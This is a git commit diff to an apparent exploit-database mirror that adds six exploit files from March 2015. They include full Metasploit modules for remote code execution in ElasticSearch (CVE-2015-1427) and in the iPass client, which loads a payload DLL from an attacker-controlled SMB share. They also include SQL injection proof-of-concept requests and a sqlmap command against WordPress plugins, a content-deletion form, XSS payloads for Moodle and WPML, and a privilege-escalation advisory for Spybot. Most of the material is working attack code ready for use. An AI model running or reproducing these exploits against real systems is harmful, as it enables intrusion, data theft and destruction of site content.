Update: 2015-03-18
6 new exploits
This commit is contained in:
parent
51e5e42e74
commit
ef2d63a0af
7 changed files with 703 additions and 0 deletions
|
@ -32833,3 +32833,9 @@ id,file,description,date,author,platform,type,port
|
|||
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
|
||||
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
|
||||
36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
|
||||
36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
|
||||
36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
|
||||
36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
|
||||
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
|
||||
36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
|
||||
36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
74
platforms/aix/dos/36413.txt
Executable file
74
platforms/aix/dos/36413.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
|
||||
Version/s Tested: 1.7.3.3
|
||||
Patched Version: 1.7.4
|
||||
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
|
||||
CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
|
||||
WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
|
||||
|
||||
Description:
|
||||
|
||||
WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
|
||||
to improve the Search Engine Optimization (SEO) of WordPress sites. The
|
||||
latest version at the time of writing (1.7.3.3) has been found to be
|
||||
affected by two authenticated (admin, editor or author user) Blind SQL
|
||||
Injection vulnerabilities. The plugin has more than one million downloads
|
||||
according to WordPress.
|
||||
|
||||
Technical Description:
|
||||
|
||||
The authenticated Blind SQL Injection vulnerability can be found within the
|
||||
'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
|
||||
parameters are not sufficiently sanitised before being used within a SQL
|
||||
query.
|
||||
|
||||
Line 529:
|
||||
|
||||
$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
|
||||
$_GET['orderby'] ) ) : 'post_title';
|
||||
|
||||
Line 533:
|
||||
|
||||
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
|
||||
|
||||
If the GET orderby parameter value is not empty it will pass its value
|
||||
through WordPess's own esc_sql() function. According to WordPress this
|
||||
function 'Prepares a string for use as an SQL query. A glorified
|
||||
addslashes() that works with arrays.'. However, this is not sufficient to
|
||||
prevent SQL Injection as can be seen from our Proof of Concept.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
|
||||
The following GET request will cause the SQL query to execute and sleep for
|
||||
10 seconds if clicked on as an authenticated admin, editor or author user.
|
||||
|
||||
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
|
||||
|
||||
Using SQLMap:
|
||||
|
||||
python sqlmap.py -u "
|
||||
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
|
||||
--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
|
||||
wordpress_logged_in_9dee67...;"
|
||||
|
||||
Impact:
|
||||
|
||||
As there is no anti-CSRF protection a remote unauthenticated attacker could
|
||||
use this vulnerability to execute arbitrary SQL queries on the victim
|
||||
WordPress web site by enticing an authenticated admin, editor or author
|
||||
user to click on a specially crafted link or visit a page they control.
|
||||
|
||||
One possible attack scenario would be an attacker adding their own
|
||||
administrative user to the target WordPress site, allowing them to
|
||||
compromise the entire web site.
|
||||
|
||||
Timeline:
|
||||
|
||||
March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
|
||||
(WPScan Team - Dewhurst Security).
|
||||
March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
|
||||
March 10th 2015 - 20:00 GMT: Vendor contacted via email.
|
||||
March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
|
||||
expected patch timeline.
|
||||
March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
|
||||
this issue.
|
||||
March 11th 2015 - 12:30 GMT: Advisory released.
|
202
platforms/java/remote/36415.rb
Executable file
202
platforms/java/remote/36415.rb
Executable file
|
@ -0,0 +1,202 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ElasticSearch Search Groovy Sandbox Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
|
||||
exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the
|
||||
REST API, which does not require authentication, where the search function allows
|
||||
groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName
|
||||
to reference arbitrary classes. It can be used to execute arbitrary Java code. This
|
||||
module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Cameron Morris', # Vulnerability discovery
|
||||
'Darren Martyn', # Public Exploit
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2015-1427'],
|
||||
['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],
|
||||
['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],
|
||||
['URL', 'http://drops.wooyun.org/papers/5107']
|
||||
],
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Targets' =>
|
||||
[
|
||||
['ElasticSearch 1.4.2', {}]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 11 2015',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9200),
|
||||
OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
result = Exploit::CheckCode::Safe
|
||||
|
||||
if vulnerable?
|
||||
result = Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
result
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Checking vulnerability...")
|
||||
unless vulnerable?
|
||||
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Discovering TEMP path...")
|
||||
res = execute(java_tmp_dir)
|
||||
tmp_dir = parse_result(res)
|
||||
if tmp_dir.nil?
|
||||
fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
|
||||
else
|
||||
print_good("#{peer} - TEMP path on '#{tmp_dir}'")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Discovering remote OS...")
|
||||
res = execute(java_os)
|
||||
os = parse_result(res)
|
||||
if os.nil?
|
||||
fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
|
||||
else
|
||||
print_good("#{peer} - Remote OS is '#{os}'")
|
||||
end
|
||||
|
||||
if os =~ /win/i
|
||||
tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"
|
||||
else
|
||||
tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")
|
||||
end
|
||||
|
||||
register_files_for_cleanup(tmp_file)
|
||||
|
||||
print_status("#{peer} - Trying to load metasploit payload...")
|
||||
java = java_load_class(os, tmp_file)
|
||||
execute(java)
|
||||
end
|
||||
|
||||
def vulnerable?
|
||||
java = 'java.lang.Math.class.forName("java.lang.Runtime")'
|
||||
|
||||
vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")
|
||||
res = execute(java)
|
||||
result = parse_result(res)
|
||||
|
||||
if result.nil?
|
||||
vprint_status("#{peer} - no response to test")
|
||||
return false
|
||||
elsif result == 'class java.lang.Runtime'
|
||||
return true
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def parse_result(res)
|
||||
unless res
|
||||
vprint_error("#{peer} - No response")
|
||||
return nil
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body
|
||||
vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
|
||||
return nil
|
||||
end
|
||||
|
||||
begin
|
||||
json = JSON.parse(res.body.to_s)
|
||||
rescue JSON::ParserError
|
||||
return nil
|
||||
end
|
||||
|
||||
begin
|
||||
result = json['hits']['hits'][0]['fields']['msf_result']
|
||||
rescue
|
||||
return nil
|
||||
end
|
||||
|
||||
result.is_a?(::Array) ? result.first : result
|
||||
end
|
||||
|
||||
def java_tmp_dir
|
||||
'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
|
||||
end
|
||||
|
||||
def java_os
|
||||
'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'
|
||||
end
|
||||
|
||||
def java_load_class(os, tmp_file)
|
||||
if os =~ /win/i
|
||||
tmp_file.gsub!(/\\/, '\\\\\\\\')
|
||||
end
|
||||
|
||||
java = [
|
||||
'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
|
||||
'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
|
||||
"i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
|
||||
'b64_i=b64.newInstance();',
|
||||
"i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
|
||||
'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
|
||||
'file_class=java.lang.Math.class.forName("java.io.File");',
|
||||
"file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
|
||||
'loader=loader_class.newInstance();',
|
||||
'loader.addURL(file_url);',
|
||||
'm=loader.loadClass(\'metasploit.Payload\');',
|
||||
'm.main(null);'
|
||||
]
|
||||
|
||||
java.join
|
||||
end
|
||||
|
||||
def execute(java, timeout = 20)
|
||||
payload = {
|
||||
"size" => 1,
|
||||
"query" => {
|
||||
"filtered" => {
|
||||
"query" => {
|
||||
"match_all" => {}
|
||||
}
|
||||
}
|
||||
},
|
||||
"script_fields" => {
|
||||
"msf_result" => {
|
||||
"script" => java
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
|
||||
'method' => 'POST',
|
||||
'data' => JSON.generate(payload)
|
||||
}, timeout)
|
||||
|
||||
res
|
||||
end
|
||||
|
||||
end
|
106
platforms/php/webapps/36414.txt
Executable file
106
platforms/php/webapps/36414.txt
Executable file
|
@ -0,0 +1,106 @@
|
|||
OVERVIEW
|
||||
==========
|
||||
|
||||
WPML is the industry standard for creating multi-lingual WordPress
|
||||
sites. Three vulnerabilities were found in the plug-in. The most
|
||||
serious of them, an SQL injection problem, allows anyone to read the
|
||||
contents of the WordPress database, including user details and
|
||||
password hashes, without authentication.
|
||||
|
||||
System administrators should update to version 3.1.9.1 released
|
||||
earlier this week to resolve the issues.
|
||||
|
||||
|
||||
|
||||
DETAILS
|
||||
========
|
||||
|
||||
1. SQL injection
|
||||
|
||||
When WPML processed a HTTP POST request containing the parameter
|
||||
”action=wp-link-ajax”, the current language is determined by parsing
|
||||
the HTTP referer. The parsed language code is not checked for
|
||||
validity, nor SQL-escaped. The user doesn’t need to be logged in.
|
||||
|
||||
By sending a carefully crafted referer value with the mentioned POST
|
||||
request parameter, an attacker can perform SQL queries on arbitrary
|
||||
tables and retrieve their results. In addition to the standard
|
||||
WordPress database and tables, the attacker may query all other
|
||||
databases and tables accessible to the web backend.
|
||||
|
||||
The following HTML snippet demonstrates the vulnerability:
|
||||
|
||||
<script>
|
||||
var union="select
|
||||
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
|
||||
wp_users";
|
||||
if (document.location.search.length < 2)
|
||||
document.location.search="lang=xx' UNION "+union+" -- -- ";
|
||||
</script>
|
||||
|
||||
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
|
||||
<input type=hidden name=action value="wp-link-ajax">
|
||||
<input type=submit>
|
||||
</form>
|
||||
|
||||
The results of the SQL query will be shown in the comments feed XML-formatted.
|
||||
|
||||
|
||||
|
||||
2. Page/post/menu deletion
|
||||
|
||||
WPML contains a ”menu sync” function which helps site administrators
|
||||
to keep WordPress menus consistent across different languages. This
|
||||
functionality lacked any access control, allowing anyone to delete
|
||||
practically all content of the website - posts, pages, and menus.
|
||||
|
||||
Example:
|
||||
|
||||
<form method=POST
|
||||
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">
|
||||
<input type=hidden name="action" value="icl_msync_confirm">
|
||||
<input type=text name="sync" size=50 value="del[x][y][12345]=z">
|
||||
<input type=submit>
|
||||
</form>
|
||||
|
||||
Submitting the above form would delete the row with the ID 12345 in
|
||||
the wp_posts database. Several items be deleted with the same request.
|
||||
|
||||
|
||||
|
||||
3. Reflected XSS
|
||||
|
||||
The ”reminder popup” code intended for administrators in WPML didn’t
|
||||
check for login status or nonce. An attacker can direct target users
|
||||
to an URL like:
|
||||
|
||||
https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f
|
||||
|
||||
|
||||
to execute JavaScript in their browser. This example bypasses the
|
||||
Chrome XSS Auditor.
|
||||
|
||||
In the case of WordPress, XSS triggered by an administrator can lead
|
||||
to server-side compromise via the plugin and theme editors.
|
||||
|
||||
|
||||
|
||||
CREDITS
|
||||
========
|
||||
|
||||
The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
|
||||
researching WordPress plugins falling in the scope of the Facebook bug
|
||||
bounty program.
|
||||
|
||||
The vendor was notified on March 02, 2015 and the patch was released
|
||||
on March 10.
|
||||
|
||||
Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/
|
||||
|
||||
An up-to-date version of this document can be found on our website
|
||||
http://klikki.fi .
|
||||
|
||||
|
||||
--
|
||||
Jouko Pynnönen <jouko@iki.fi>
|
||||
Klikki Oy - http://klikki.fi
|
148
platforms/php/webapps/36418.txt
Executable file
148
platforms/php/webapps/36418.txt
Executable file
|
@ -0,0 +1,148 @@
|
|||
?
|
||||
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting
|
||||
|
||||
|
||||
Vendor: Moodle Pty Ltd
|
||||
Product web page: https://www.moodle.org
|
||||
Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9
|
||||
|
||||
Summary: Moodle is a learning platform designed to provide
|
||||
educators, administrators and learners with a single robust,
|
||||
secure and integrated system to create personalised learning
|
||||
environments.
|
||||
|
||||
Desc: Moodle suffers from persistent XSS vulnerabilities. Input
|
||||
passed to the POST parameters 'config_title' and 'title' thru
|
||||
index.php, are not properly sanitized allowing the attacker to
|
||||
execute HTML or JS code into user's browser session on the affected
|
||||
site. Affected components: Blocks, Glossary, RSS and Tags.
|
||||
|
||||
Tested on: nginx
|
||||
PHP/5.4.22
|
||||
|
||||
|
||||
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2015-5236
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php
|
||||
|
||||
Vendor Advisory ID: MSA-15-0013
|
||||
Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383
|
||||
|
||||
CVE ID: CVE-2015-2269
|
||||
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269
|
||||
|
||||
|
||||
09.02.2015
|
||||
|
||||
--
|
||||
|
||||
|
||||
Random Glossary Entry
|
||||
---------------------
|
||||
|
||||
POST http://WEB/my/index.php HTTP/1.1
|
||||
|
||||
|
||||
_qf__block_glossary_random_edit_form=1
|
||||
bui_contexts=0
|
||||
bui_defaultregion=side-pre
|
||||
bui_defaultweight=4
|
||||
bui_editid=304
|
||||
bui_editingatfrontpage=0
|
||||
bui_pagetypepattern=my-index
|
||||
bui_parentcontextid=411
|
||||
bui_region=side-pre
|
||||
bui_subpagepattern=%@NULL@%
|
||||
bui_visible=1
|
||||
bui_weight=4
|
||||
config_addentry=test
|
||||
config_invisible=test2
|
||||
config_refresh=0
|
||||
config_showconcept=1
|
||||
config_title=" onmouseover=prompt("XSS1") >
|
||||
config_type=0
|
||||
config_viewglossary=test3
|
||||
mform_isexpanded_id_configheader=1
|
||||
mform_isexpanded_id_onthispage=0
|
||||
mform_isexpanded_id_whereheader=0
|
||||
sesskey=S8TXvxdEKF
|
||||
submitbutton=Save changes
|
||||
|
||||
|
||||
Remote RSS Feeds
|
||||
----------------
|
||||
|
||||
POST http://WEB/my/index.php HTTP/1.1
|
||||
|
||||
|
||||
_qf__block_rss_client_edit_form=1
|
||||
bui_contexts=0
|
||||
bui_defaultregion=side-pre
|
||||
bui_defaultweight=4
|
||||
bui_editid=312
|
||||
bui_editingatfrontpage=0
|
||||
bui_pagetypepattern=my-index
|
||||
bui_parentcontextid=411
|
||||
bui_region=side-pre
|
||||
bui_subpagepattern=%@NULL@%
|
||||
bui_visible=1
|
||||
bui_weight=4
|
||||
config_block_rss_client_show_channel_image=0
|
||||
config_block_rss_client_show_channel_link=0
|
||||
config_display_description=0
|
||||
config_rssid=_qf__force_multiselect_submission
|
||||
config_rssid[]=3
|
||||
config_shownumentries=11
|
||||
config_title=" onmouseover=prompt("XSS2") >
|
||||
mform_isexpanded_id_configheader=1
|
||||
mform_isexpanded_id_onthispage=0
|
||||
mform_isexpanded_id_whereheader=0
|
||||
sesskey=S8TXvxdEKF
|
||||
submitbutton=Save changes
|
||||
|
||||
|
||||
Tags
|
||||
----
|
||||
|
||||
POST http://WEB/my/index.php HTTP/1.1
|
||||
|
||||
|
||||
_qf__block_tags_edit_form=1
|
||||
bui_contexts=0
|
||||
bui_defaultregion=side-pre
|
||||
bui_defaultweight=4
|
||||
bui_editid=313
|
||||
bui_editingatfrontpage=0
|
||||
bui_pagetypepattern=my-index
|
||||
bui_parentcontextid=411
|
||||
bui_region=side-pre
|
||||
bui_subpagepattern=%@NULL@%
|
||||
bui_visible=1
|
||||
bui_weight=4
|
||||
config_numberoftags=80
|
||||
config_tagtype=
|
||||
config_title=Tags" onmouseover=prompt("XSS3") >
|
||||
mform_isexpanded_id_configheader=1
|
||||
mform_isexpanded_id_onthispage=0
|
||||
mform_isexpanded_id_whereheader=0
|
||||
sesskey=S8TXvxdEKF
|
||||
submitbutton=Save changes
|
||||
|
||||
|
||||
Older not supported versions
|
||||
----------------------------
|
||||
|
||||
POST http://WEB/blog/index.php HTTP/1.1
|
||||
|
||||
blockaction=config
|
||||
filterselect=1343
|
||||
filtertype=user
|
||||
instanceid=4992
|
||||
numberoftags=20
|
||||
sesskey=0QCG5LQz0Q
|
||||
sort=name
|
||||
timewithin=90
|
||||
title=ZSL"><script>alert(document.cookie);</script>
|
53
platforms/windows/local/36417.txt
Executable file
53
platforms/windows/local/36417.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
?
|
||||
Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation
|
||||
|
||||
|
||||
Vendor: Safer-Networking Ltd.
|
||||
Product web page: http://www.safer-networking.org
|
||||
Affected version: 1.6.2
|
||||
|
||||
Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal
|
||||
computer program compatible with Microsoft Windows 95 and later. It scans
|
||||
the computer hard disk and/or RAM for malicious software.
|
||||
|
||||
Desc: The application suffers from an unquoted search path issue impacting
|
||||
the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D.
|
||||
This could potentially allow an authorized but non-privileged local
|
||||
user to execute arbitrary code with elevated privileges on the system. A
|
||||
successful attempt would require the local user to be able to insert their
|
||||
code in the system root path undetected by the OS or other security applications
|
||||
where it could potentially be executed during application startup or reboot.
|
||||
If successful, the local user’s code would execute with the elevated privileges
|
||||
of the application.
|
||||
|
||||
Tested on: Microsoft Windows Ultimate 7 SP1 (EN)
|
||||
|
||||
|
||||
Vulnerability discovered by Aljaz Ceru
|
||||
aljaz@insec.si
|
||||
|
||||
|
||||
Advisory ID: ZSL-2015-5237
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5237.php
|
||||
|
||||
|
||||
17.02.2015
|
||||
|
||||
---
|
||||
|
||||
|
||||
C:\Users\user>sc qc SBSDWSCService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: SBSDWSCService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : SBSD Security Center Service
|
||||
DEPENDENCIES : wscsvc
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
C:\Users\user>
|
114
platforms/windows/remote/36412.rb
Executable file
114
platforms/windows/remote/36412.rb
Executable file
|
@ -0,0 +1,114 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Client::Authenticated
|
||||
include Msf::Exploit::Remote::SMB::Server::Share
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'IPass Control Pipe Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the IPass Client service. This service provides a
|
||||
named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
|
||||
to force the service to load a DLL from a SMB share.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Matthias Kaiser', # Vulnerability discovery
|
||||
'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-0925' ],
|
||||
[ 'OSVDB', '117423' ],
|
||||
[ 'BID', '72265' ],
|
||||
[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows x32', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 21 2015',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
|
||||
], self.class)
|
||||
|
||||
deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
|
||||
end
|
||||
|
||||
def check
|
||||
echo_value = rand_text_alphanumeric(rand(10) + 10)
|
||||
|
||||
begin
|
||||
response = send_command("System.Echo #{echo_value}")
|
||||
if response =~ Regexp.new(echo_value)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
rescue Rex::ConnectionError => e
|
||||
vprint_error("Connection failed: #{e.class}: #{e}")
|
||||
return Msf::Exploit::CheckCode::Unknown
|
||||
rescue Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
vprint_error('Connection reset during login')
|
||||
return Msf::Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def setup
|
||||
super
|
||||
self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
|
||||
self.share = Rex::Text.rand_text_alpha(5)
|
||||
end
|
||||
|
||||
def primer
|
||||
self.file_contents = generate_payload_dll
|
||||
print_status("File available on #{unc}...")
|
||||
send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
|
||||
end
|
||||
|
||||
def send_command(command)
|
||||
# The connection is closed after each command, so we have to reopen it
|
||||
connect
|
||||
smb_login
|
||||
pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
|
||||
pipe.write(Rex::Text.to_unicode(command))
|
||||
response = Rex::Text.to_ascii(pipe.read)
|
||||
|
||||
response
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
begin
|
||||
Timeout.timeout(datastore['SMB_DELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# do nothing... just finish exploit and stop smb server...
|
||||
end
|
||||
end
|
||||
|
||||
end
|
Loading…
Add table
Reference in a new issue